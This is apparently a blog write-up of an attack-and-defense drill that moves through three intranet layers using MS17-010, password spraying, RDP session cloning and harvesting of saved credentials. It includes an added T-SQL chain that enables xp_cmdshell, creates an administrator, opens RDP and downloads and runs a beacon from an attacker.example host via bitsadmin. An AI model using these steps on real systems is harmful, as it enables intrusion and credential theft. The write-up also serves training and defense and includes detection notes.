Title: One engagement penetrating a workgroup intranet down to the third network layer [breaking through every intranet machine from 0 to 1]


Preface

During an attack-and-defense drill, the team first obtained a webshell and then passed the session to CobaltStrike so that I could carry out the intranet penetration:

I found that the current machine was a public-facing server with only a public IP: xxx.xxx.xxx.16

Looking at the ARP cache, I found a number of other public-IP machines:

Querying these IPs showed that they belong to the same network, and an Nbtscan of the current C segment (the /24) found live hosts. (My initial guess was that the machines in this C segment might be part of a domain, but that was not certain.)

Lateral movement within the C segment of the first-layer intranet machine

Since this was an attack-and-defense drill, the more points the better, so I did not worry about some other considerations here. After taking the current machine, I dumped a plaintext password:

However, spraying this password across the C segment with MSF did not get me onto a single host:

So I scanned again for MS17-010. (Networks like this one usually have several EternalBlue-vulnerable hosts, so it is always worth a scan.)

Three hosts, .92, .151 and .200, were vulnerable to MS17-010, so I exploited .92 first:

Then I linked MSF and CS, passed the MSF session over to CS and established persistence:

Two pivot machines were enough at this point; there was no need to exploit the other two MS17-010 hosts. I then gathered information on the C segment and scanned for live web assets, finding a large number of them:

Manual testing turned up a SQL injection running with DBA privileges:

I added an administrator user and enabled 3389. (Norton was running on the host and I had no time for the usual AV evasion work; since points were the priority, I simply logged into the server directly.)

I could not connect directly through the SOCKS proxy, which felt like some kind of restriction; later I found that mstsc /admin logged in fine (the /admin switch connects to the server's administrative session, which bypasses the Remote Desktop licensing check that commonly rejects ordinary connections):

Using .92 as a jump host, I logged into the remote desktop of .71:

I cloned the administrator's desktop:

Logging in over RDP with the account I had added now gave me the administrator's desktop:

After a round of information gathering and credential harvesting, I obtained access to MSSQL and to all the other sites hosted on the same server:

Spraying the harvested passwords across the C segment then succeeded against the MSSQL server at xxx.xxx.xxx.239:

I then called xp_cmdshell directly to execute commands and found that it ran with very high privileges:

Then I used bitsadmin to pull down a payload and bring the host online in CS:

At this point I had control of three machines, .16, .92 and .239, but had still not found a way into the internal network, and I hit a bottleneck.
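The chain from a DBA-level MSSQL foothold to an RDP login and a CS beacon, as used against .71 and .239 above, written out as an added T-SQL example (this is not code from the original post). It assumes a login in the sysadmin server role; the user name, password, download URL and file path are placeholders.

```sql
-- Added example, not from the original post. Assumes a sysadmin-level
-- SQL Server login (the post's "DBA permission"). User name, password,
-- URL and paths below are placeholders.

-- 1. Confirm the privilege level before doing anything noisy.
SELECT SYSTEM_USER                         AS login_name,
       IS_SRVROLEMEMBER('sysadmin')        AS is_sysadmin,  -- 1 = the chain below is possible
       SERVERPROPERTY('ProductVersion')    AS version;

-- 2. xp_cmdshell is disabled by default; enabling it requires sysadmin.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;          RECONFIGURE;

-- 3. Commands run as the SQL Server service account. LocalSystem or an
--    over-privileged service account is what produces "very high privileges".
EXEC xp_cmdshell 'whoami';

-- 4. Add a local administrator and put it in the RDP group (placeholder names).
EXEC xp_cmdshell 'net user drilluser "P@ssw0rd-Example!" /add';
EXEC xp_cmdshell 'net localgroup administrators drilluser /add';
EXEC xp_cmdshell 'net localgroup "Remote Desktop Users" drilluser /add';

-- 5. Turn on RDP (3389) and allow it through the host firewall.
EXEC xp_cmdshell 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f';
EXEC xp_cmdshell 'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes';

-- 6. Fetch and run a CS stager with bitsadmin (placeholder URL and path).
EXEC xp_cmdshell 'bitsadmin /transfer job /download /priority high http://attacker.example/beacon.exe C:\Windows\Temp\b.exe';
EXEC xp_cmdshell 'C:\Windows\Temp\b.exe';
```

What xp_cmdshell can do depends entirely on the account the SQL Server service runs as, so step 3 is worth running before anything else. On the defensive side every step here is loud: the sp_configure change is written to the SQL Server error log, and net.exe, reg.exe and bitsadmin.exe spawning as children of sqlservr.exe are standard Sysmon/EDR detections.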

I could not move any further laterally and did not want to burn a 0day on the other web applications, so I went back and used MS17-010 against .200:

In the same way, I passed the shell to CS, added a user and put it in the Remote Desktop Users group:

The login attempt failed:

Again, mstsc /admin bypassed this and logged into the target's remote desktop:

I cloned the administrator's desktop in the same way:

It held a lot of valuable material, such as mstsc connection history:

Navicat database credentials:

and a large number of SSH sessions saved in Xshell:

Every one of those Linux hosts could be logged into; all that was needed was SharpDecryptPwd to recover the saved passwords, but I ran into a problem:

Later I used this tool instead to view the passwords. (I did not want to use the other tools; checking passwords one at a time is too tedious.)

I found that several machines were on the 10.x internal network:

I sprayed the Linux hosts in the C segment with the passwords I already had:

and brought a few shells back to MSF:

By this point the public C segment had essentially been taken, including a large number of core databases, switches and web servers. The next step was to penetrate the 10.x internal network.

Second-layer intranet: penetrating the 10.x segment

Since I had root passwords, I scanned the whole B segment, 10.10.10.1/16, directly. There was a huge number of assets, hundreds of them, which I will not screenshot here, and among them I found ESXi:

and an access control system:

Through special means I took down two SSH hosts in the 10.x segment laterally and found that the third-layer intranet was a 192.x segment with a Docker environment:

Since the 10.x segment had ESXi, I used the vulnerability to take over the ESXi platform directly, and with it all of the virtual machines it hosted:

At that point the 10.x segment had essentially been taken, and the next step was the 192.x intranet.

Third-layer intranet: penetrating the 192.x segment

A routine fscan sweep of the 192.x segment showed that it was also rich in assets:

and turned up two more MS17-010-vulnerable hosts:

To sum up the relationships, the environment at this point looks like this:

Original link: https://mp.weixin.qq.com/s?__biz=MzkxNDEwMDA4Mw==mid=2247491421idx=1sn=769d715d05057112eb4ee1ebb8312e37chksm=c172c541f6054c571e482d42 83f946625f2689ec6214e9d47a61c66399ee7d2cd2a62c0de464scene=123key=f3d6282f44b990e0f2527af4db8e088f25f3e43d0abaf5f845ff52e14965e4fe188c890
